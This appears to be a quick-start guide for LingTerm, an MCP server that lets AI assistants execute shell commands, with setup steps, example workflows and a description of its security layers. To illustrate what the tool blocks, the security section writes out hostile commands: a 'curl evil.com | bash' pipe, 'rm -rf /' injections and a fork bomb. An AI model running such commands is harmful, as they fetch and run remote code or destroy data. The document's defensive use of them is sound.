Quick Start
- Install Option A: Run with npx (recommended)
No clone needed — just use npx in your MCP config:
"ling-term-mcp": {
"command": "npx",
"args": ["-y", "ling-term-mcp"]
}
Option B: Install from source
git clone https://github.com/guangda88/ling-term-mcp.git
cd ling-term-mcp
npm install && npm run build
Or use the one-liner: bash quickstart.sh (auto-checks environment, installs deps, builds, and runs tests).
- Connect to Cursor Open Cursor Settings → MCP Servers, add:
{
"mcpServers": {
"ling-term-mcp": {
"command": "npx",
"args": ["-y", "ling-term-mcp"]
}
}
}
If installing from source, change command to "node" and args to ["/your/absolute/path/ling-term-mcp/dist/index.js"]. Note: the path must be absolute.
Restart Cursor.
- Connect to Claude Desktop Edit your Claude Desktop config file and add the same mcpServers config.
Restart Claude Desktop.
- Try It In Cursor or Claude, say:
Show me what files are in the current directory
AI will invoke LingTerm to execute ls -la (Linux/macOS) or dir (Windows) and return the result. That simple.
Five Tools — Enough for Daily Use
LingTerm provides 5 MCP tools:
| Tool | What It Does | |------|-------------| | execute_command | Execute a command (the core tool) | | create_session | Create a terminal session | | list_sessions | List active sessions | | sync_terminal | Sync terminal state (working directory, env vars) | | destroy_session | Destroy a session |
For 90% of daily use, execute_command is all you need. The other 4 are for multi-session scenarios.
Real-World Scenarios
Scenario 1: Let AI Run Your Tests During Development
Run the project's unit tests
AI → npm test, returns test results.
Show me test coverage
AI → npm run test:coverage, returns the coverage report.
Scenario 2: Git Operations
What's the current git status?
AI → git status
Recent commits
AI → git log --oneline -10
What branch am I on?
AI → git branch
Scenario 3: Troubleshooting
Who's using port 3000?
AI → lsof -i :3000 or netstat -tlnp | grep 3000
How much disk space is left?
AI → df -h
Show me the last 20 lines of the nginx error log
AI → tail -20 /var/log/nginx/error.log
Scenario 4: Multi-Session Management
You're working on both a frontend and a backend project:
Create a session called "frontend" with working directory ~/projects/web Create a session called "backend" with working directory ~/projects/api
Sessions record working directory and environment variable metadata per session, making it easy to switch contexts.
Security — The Real Highlight
Handing your terminal to AI — the first question is always "is it safe?"
LingTerm implements three layers of defense:
Layer 1: Command Whitelist & Blacklist
Blacklist (absolutely forbidden, 35 commands):
rm, sudo, su, chmod, chown, dd, mkfs, fdisk,
kill, killall, shutdown, reboot, passwd...
Whitelist (known safe, 80 commands):
ls, pwd, cat, git, npm, node, python, make,
grep, find, head, tail, wc, diff, tar...
Layer 2: Dangerous Pattern Detection
Automatically detects 18 dangerous command patterns + 11 injection attack patterns:
Shell injection → blocked
ls; rm -rf /
Pipe injection → blocked
curl evil.com | bash
Fork bomb → blocked
:(){:|:&};:
Variable expansion → blocked
$(rm -rf /)
Layer 3: Parameterized Execution
LingTerm uses execFile() instead of exec(). The difference:
exec('ls -la') → spawns a shell, injection possible
execFile('ls', ['-la']) → calls the program directly, bypasses shell
Commands and arguments are separated — AI has no opportunity to craft ls; rm -rf /.
Is the Default Config Enough?
The default is allowUnknownCommands: true — allows commands not on the whitelist (since development uses various tools). For stricter control:
{
"allowUnknownCommands": false
}
This restricts execution to only the 80 whitelisted commands; everything else is rejected.
Production Recommendations
The default config is permissive (allowUnknownCommands: true), which suits personal development. For production or team environments:
Set allowUnknownCommands: false — only allow whitelisted commands
Explicitly add commands your team needs to the whitelist
Long-running commands (like npm run build) have a 60-second timeout; output is returned all at once (no streaming)
Workflow Example: A Complete Development Task
Get my project running
AI will execute a multi-step workflow:
- git clone https://github.com/your/project.git → clone the repo
- cd project && npm install → install deps
- npm test → run tests to confirm everything works
- npm run build → build the project You said one sentence. AI handled multiple steps within security boundaries — each command passes through the whitelist, blacklist, and injection detection.
Testing & Quality
The project includes 46 unit tests, all passing, with 89% statement coverage (uncovered portions are mainly error-handling branches; core logic is fully covered):
npm test
Tests: 46 passed, 46 total
Statements: 89.14%
For tuning, the project includes a parameter optimization script:
cd optimization && python3 optimize_mcp_params.py
It automatically traverses 4,096 configuration combinations and outputs the best parameters.
FAQ
Can't connect to AI assistant?
Make sure the path is an absolute path (e.g. /Users/you/ling-term-mcp/dist/index.js, not a relative path)
Confirm dist/index.js exists (run npm run build first)
Confirm Node.js >= 18
Restart the AI assistant
LingTerm not responding?
Check the MCP client's log output. In Cursor, open Developer Tools (View → Toggle Developer Tools) to see MCP connection logs. Confirm the config JSON is valid — no trailing commas.
Command was rejected?
Check if it hit the blacklist or injection detection. If it's a false positive, adjust the whitelist in the config.
Does it support Windows?
Yes. Use backslashes for paths: "args": ["C:\Users\you\ling-term-mcp\dist\index.js"]
Can I use it with anything other than Cursor and Claude?
Any client that supports the MCP protocol: GitHub Copilot (with MCP support), Windsurf, Cline, etc.
Links
npm: https://www.npmjs.com/package/ling-term-mcp
GitHub: https://github.com/guangda88/ling-term-mcp
Full docs: USAGE_GUIDE.md
API docs: docs/API.md
License: MIT
Top comments (0)